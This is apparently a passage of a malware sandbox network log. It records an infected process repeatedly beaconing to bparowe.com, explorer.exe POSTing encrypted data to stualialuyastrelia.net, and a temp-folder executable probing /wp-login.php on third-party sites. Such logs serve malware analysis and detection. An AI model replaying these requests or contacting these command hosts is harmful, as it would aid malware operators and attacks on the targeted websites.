                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                211192.168.2.456176185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:54.017250061 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:54.295175076 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:54 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                212192.168.2.456177185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:55.051201105 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:55.328526974 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:55 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                213192.168.2.456178185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:55.962568045 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:56.240103006 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:56 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                214192.168.2.456179185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:56.741938114 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:57.016184092 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:56 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                215192.168.2.456180185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:57.581051111 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:57.859266043 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:57 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                216192.168.2.456181185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:58.327121973 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:58.607028008 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:58 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                217192.168.2.456182185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:59.050847054 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:59.341496944 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:59 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                218192.168.2.456183185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:59.732510090 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:00.007190943 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:59 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                219192.168.2.456185185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:00.454236984 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:00.732146025 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:00 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                220192.168.2.456186185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:01.141549110 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:01.421765089 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:01 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                221192.168.2.45618791.215.85.17802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:01.193212986 CET282OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://xqpfuelbjlrovtg.com/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:01.193263054 CET109OUTData Raw: 48 9d 8e cc 3b 67 52 24 2a 0a 26 27 7e ac 56 cb 5e 66 e8 16 fd 6a d7 aa c6 6c a0 86 76 f7 a7 96 fb ad fb c4 03 46 ee b1 a7 5e 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                                Data Ascii: H;gR$*&'~V^fjlvF^j~_=;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:01.479590893 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:01 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                222192.168.2.456188185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:01.861236095 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:02.135127068 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:02 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                223192.168.2.456190185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:02.565663099 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:02.846365929 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:02 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                224192.168.2.458777172.67.152.228805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.677901983 CET172OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: keramat.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.830818892 CET695INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:03 GMT
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                Expires: Thu, 21 Dec 2023 05:05:03 GMT
                                                                                                                                                                                                                                                                                                                                Location: https://keramat.sk/wp-login.php
                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TTTm5uPrWddxSWIFY6j7%2BSf782ntNNdMQEVDwpOAD7Zb5UvnrbZ1wOmON3%2FGC%2FnG%2FovJvV5aEvFAN1dbVEKt56BnBZM2fZ1nzsPMvds4Y8o7SvbkSvSSze%2FA6Nir"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                CF-RAY: 838d3e9a5bf26da4-MIA
                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                225192.168.2.45807823.239.22.202805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.879172087 CET173OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: aexoden.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.075433969 CET430INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:03 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Location: https://aexoden.com:443/wp-login.php
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15724800; includeSubdomains
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                226192.168.2.459461185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.204571009 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.484392881 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:04 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                227192.168.2.459462185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:05.024399996 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
